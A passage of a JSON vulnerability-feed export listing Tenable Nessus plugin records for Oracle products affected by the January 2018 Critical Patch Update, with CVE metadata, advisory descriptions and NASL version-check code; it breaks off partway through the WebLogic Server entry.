{"nessus": [{"lastseen": "2023-12-07T16:34:03", "description": "According to its self-reported version, the Oracle iPlanet Web Server (formerly known as Sun Java System Web Server) running on the remote host is 7.0.x prior to 7.0.27 Patch 26834070. It is, therefore, affected by an unspecified vulnerability in the Network Security Services (NSS) library with unknown impact.", "cvss3": {}, "published": "2018-01-25T00:00:00", "type": "nessus", "title": "Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2594", "CVE-2018-2595", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2610", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2733"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:iplanet_web_server", "cpe:/a:mozilla:network_security_services"], "id": "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "href": "https://www.tenable.com/plugins/nessus/106349", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106349);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2015-7940\",\n \"CVE-2016-0635\",\n \"CVE-2016-1182\",\n \"CVE-2016-2107\",\n \"CVE-2016-2179\",\n \"CVE-2017-3732\",\n \"CVE-2017-5645\",\n \"CVE-2017-9798\",\n \"CVE-2017-10068\",\n \"CVE-2017-10262\",\n \"CVE-2017-10273\",\n \"CVE-2017-10352\",\n \"CVE-2017-12617\",\n \"CVE-2018-2561\",\n \"CVE-2018-2564\",\n \"CVE-2018-2584\",\n \"CVE-2018-2594\",\n 
\"CVE-2018-2595\",\n \"CVE-2018-2596\",\n \"CVE-2018-2601\",\n \"CVE-2018-2610\",\n \"CVE-2018-2625\",\n \"CVE-2018-2711\",\n \"CVE-2018-2713\",\n \"CVE-2018-2715\",\n \"CVE-2018-2733\"\n );\n script_bugtraq_id(\n 78215,\n 79091,\n 89760,\n 91067,\n 91869,\n 92987,\n 95814,\n 97702,\n 98050,\n 100872,\n 100954,\n 102442,\n 102535,\n 102539,\n 102541,\n 102545,\n 102550,\n 102553,\n 102558,\n 102562,\n 102565,\n 102567,\n 102569,\n 102573,\n 102634,\n 102637,\n 102641,\n 102643\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an unspecified vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Oracle iPlanet Web Server\n(formerly known as Sun Java System Web Server) running on the remote\nhost is 7.0.x prior to 7.0.27 Patch 26834070. 
It is, therefore,\naffected by an unspecified vulnerability in the Network Security\nServices (NSS) library with unknown impact.\");\n # http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae82f1b1\");\n # https://support.oracle.com/epmos/faces/SearchDocDisplay?_adf.ctrl-state=14v5w3zyq8_4&_afrLoop=466151680153736#babhdcfj\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fccabced\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle iPlanet Web Server version 7.0.27 or later as\nreferenced in the January 2018 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:iplanet_web_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:network_security_services\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_iplanet_web_server_detect.nbin\");\n script_require_keys(\"installed_sw/Oracle iPlanet Web Server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"http.inc\");\n\napp_name = \"Oracle iPlanet Web Server\";\nport = get_http_port(default:8989);\n\ninstall = get_single_install(app_name:app_name, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = \"7.0.27\";\nmin = \"7.0\";\n\n\n\n# Affected 7.0.x < 7.0.27\nif (\n ver_compare(ver:version, fix:min, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:fix, strict:FALSE) == -1\n)\n{\n report = report_items_str(\n report_items:make_array(\n \"Installed version\", version,\n \"Fixed version\", fix\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, app_name, port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:43:08", "description": "The version of Oracle Business Intelligence Publisher running on the remote host is 11.1.1.9.x prior to 
11.1.1.9.180116 or 12.2.1.2.x prior to 12.2.1.2.180116 or 12.2.1.3.x prior to 12.2.1.3.180116. It is, therefore, affected by multiple vulnerabilities as noted in the January 2018 Critical Patch Update advisory.\nThe Oracle Business Intelligence Publisher installed on the remote host is affected by multiple vulnerabilities:\n\n - An improper restriction of the lifetime of queue entries associated with unused out-of-order messages allows a remote attacker to cause a denial of service in the DTLS implementation of OpenSSL before 1.1.0 (CVE-2016-2179).\n - An easily exploitable vulnerability allows an unauthenticated attacker with network access to compromise Oracle Business Intelligence Enterprise Edition via HTTP. A successful attack of this vulnerability would result in unauthorized access to data as well as unauthorized update, insert or delete.\n This attack would require human interaction. (CVE-2017-10068).\n - A low-privileged attacker with network access via HTTP can exploit a vulnerability in Oracle Business Intelligence Enterprise Edition. 
A successful attack would allow the unauthorized access to critical data (CVE-2018-2715).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-12-27T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2179", "CVE-2017-10068", "CVE-2018-2715"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_JAN_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/119885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119885);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-2179\", \"CVE-2017-10068\", \"CVE-2018-2715\");\n script_bugtraq_id(92987, 102535, 102558);\n\n script_name(english:\"Oracle Business Intelligence Publisher Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Publisher running on the\nremote host is 11.1.1.9.x prior to 11.1.1.9.180116 or\n12.2.1.2.x prior to 12.2.1.2.180116 or 12.2.1.3.x prior to \n12.2.1.3.180116. 
\nIt is, therefore, affected by multiple vulnerabilities as noted in \nthe January 2018 Critical Patch Update advisory.\nThe Oracle Business Intelligence Publisher installed on the remote\nhost is affected by multiple vulnerabilities:\n\n - An improper restriction of the lifetime of queues entries\n associated with unused our-of-order messages allows an\n remote attacker to cause a denial of service in the \n DTLS implementationof OpenSSL before 1.1.0\n (CVE-2016-2179).\n - An easily exploitable vulnerability allows an\n unauthenticated attacker with network access to \n compromise Oracle Business Intelligence Enterprise\n Edition via HTTP. A Successful attack of this \n vulnerability would result in unauthorized access to\n data as well as unauthorized update, insert or delete.\n This attack would required human interaction. \n (CVE-2017-10068).\n - An low privileged attacker with network access via HTTP\n can exploit a vulnerability in Oracle Business\n Intelligence Enterprise Edition. 
A successful attack\n would allow the unauthorized access to critical data\n (CVE-2018-2715).\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7ee54bd8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10068\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\", \"oracle_bi_publisher_detect.nasl\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\nappname = 'Oracle Business Intelligence Publisher';\napp_info = vcf::get_app_info(app:appname);\n\n# 11.1.1.9.x - Bundle: 27281232 | Patch: 27321329\n# 12.2.1.2.x - Bundle: 27072632 | Patch: 27072632\n# 12.2.1.3.x - Bundle: 26796833 | Patch: 26796833\n\nconstraints = [\n {'min_version': '11.1.1.9', 'fixed_version': '11.1.1.9.180116', 'patch': '27321329', 'bundle': '27281232'},\n {'min_version': '12.2.1.2', 'fixed_version': '12.2.1.2.180116', 'patch': '27072632', 'bundle': '28500593'},\n {'min_version': '12.2.1.3', 'fixed_version': '12.2.1.3.180116', 'patch': '26796833', 'bundle': '26796833'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T14:22:59", "description": "The version of Oracle WebCenter Portal installed on the remote host is missing a security patch from the January 2018 Critical Patch Update (CPU). It is, therefore, affected by multiple vulnerabilities.\n\n - A vulnerability in the PeopleSoft Enterprise HCM Human Resources component of Oracle PeopleSoft Products (subcomponent: Install (Bouncy Castle Java package)).\n Supported versions that are affected are 9.1 and 9.2.\n An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise PeopleSoft Enterprise HCM Human Resources.\n A successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise HCM Human Resources accessible data.\n (CVE-2015-7940)\n\n - A vulnerability in the Oracle WebCenter Portal component of Oracle Fusion Middleware (subcomponent: Security Framework (Apache Struts 1)). 
Supported versions that are affected are 11.1.1.9.0, 12.2.1.2.0 and 12.2.1.3.0. An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise Oracle WebCenter Portal. A successful attack of this vulnerability can result in a complete Denial-of-Service of Oracle WebCenter Portal including the update, insert or delete access to some of Oracle Web Portal accessible data. (CVE-2016-1182)\n\n - A vulnerability in the Oracle WebCenter Portal component of Oracle Fusion Middleware (subcomponent: WebCenter Spaces Application). Supported versions that are affected are 11.1.1.9.0, 12.2.1.2.0 and 12.2.1.3.0. An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise Oracle WebCenter Portal.\n A successful attack requires human interaction to be effective and can result in unauthorized creation, deletion or modification access to Oracle WebCenter Portal data.\n (CVE-2018-2713)", "cvss3": {}, "published": "2018-02-12T00:00:00", "type": "nessus", "title": "Oracle WebCenter Portal Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940", "CVE-2016-1182", "CVE-2018-2713"], "modified": "2023-10-18T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2018.NBIN", "href": "https://www.tenable.com/plugins/nessus/106759", "sourceData": "Binary data oracle_webcenter_portal_cpu_jan_2018.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:34:46", "description": "The version of Oracle JDeveloper installed on the remote host is missing a security patch. 
Please see the vendor advisory for additional information.", "cvss3": {}, "published": "2018-02-20T00:00:00", "type": "nessus", "title": "Oracle JDeveloper Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10273", "CVE-2018-2711"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:jdeveloper"], "id": "ORACLE_JDEVELOPER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106903", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106903);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10273\", \"CVE-2018-2711\");\n script_bugtraq_id(102539, 102569);\n\n script_name(english:\"Oracle JDeveloper Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development application installed on the remote host is\naffected by a vulnerability which allows restricted path traversal \ndue to improperly sanitized input as well as allowing the attacker\naccess to partially modify data\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JDeveloper installed on the remote host is\nmissing a security patch. 
Please see the vendor advisory for \nadditional information.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n # https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=398463191708425&id=2325393.1&_afrWindowMode=0&_adf.ctrl-state=13jjrzsqze_249\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2edd68c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2711\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdeveloper\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jdeveloper_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle JDeveloper\");\n\n exit(0);\n}\n\ninclude('vcf_extras_oracle.inc');\n\nvar app_info = vcf::oracle_jdev::get_app_info();\n\nvar constraints = [\n { 'min_version':'11.1.1.7', 'fixed_version':'11.1.1.7.171220', 'missing_patch':'27251436' },\n { 'min_version':'11.1.1.9', 'fixed_version':'11.1.1.9.171117', 'missing_patch':'27120730' },\n { 'min_version':'11.1.2.4', 'fixed_version':'11.1.2.4.171206', 'missing_patch':'27213077' },\n { 'min_version':'12.1.3.0', 'fixed_version':'12.1.3.0.171218', 'missing_patch':'27131743' },\n { 'min_version':'12.2.1.2', 'fixed_version':'12.2.1.2.171017', 'missing_patch':'26752344' }\n];\n\nvcf::oracle_jdev::check_version_and_report(\n app_info:app_info,\n severity:SECURITY_WARNING,\n constraints:constraints\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:31:23", "description": "The remote host is missing the January 2018 Critical Patch Update for Oracle Identity Manager. 
It is, therefore, affected by multiple vulnerabilities as described in the January 2018 critical patch update advisory.", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "nessus", "title": "Oracle Identity Manager Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2016-0635"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:identity_manager"], "id": "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106140);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7501\", \"CVE-2016-0635\");\n script_bugtraq_id(78215, 91869);\n\n script_name(english:\"Oracle Identity Manager Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the January 2018 Critical Patch Update for\nOracle Identity Manager. 
It is, therefore, affected by multiple\nvulnerabilities as described in the January 2018 critical patch\nupdate advisory.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:identity_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_identity_management_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Identity Manager\");\n\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Identity Manager\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\nfixed = NULL;\nreport = NULL;\n\nif (version =~ \"^11\\.1\\.2\\.3(\\.|$)\")\n fixed = '11.1.2.3.180111';\n\nif (!isnull(fixed))\n{\n if (ver_compare(ver:version, fix:fixed, strict:FALSE) < 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n }\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, product, version, path);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:00", "description": "The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in the January 2018 CPU advisory, as follows:\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.\n (CVE-2017-10352)\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2018-2625)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-16T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10352", "CVE-2018-2625"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/144326", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144326);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10352\", \"CVE-2018-2625\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple 
vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in\nthe January 2018 CPU advisory, as follows:\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web\n Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and\n 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP\n to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may\n significantly impact additional products. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic\n Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server\n accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.\n (CVE-2017-10352)\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web\n Services). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.2.0. Easily\n exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise\n Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to\n a subset of Oracle WebLogic Server accessible data. 
(CVE-2018-2625)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujan2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
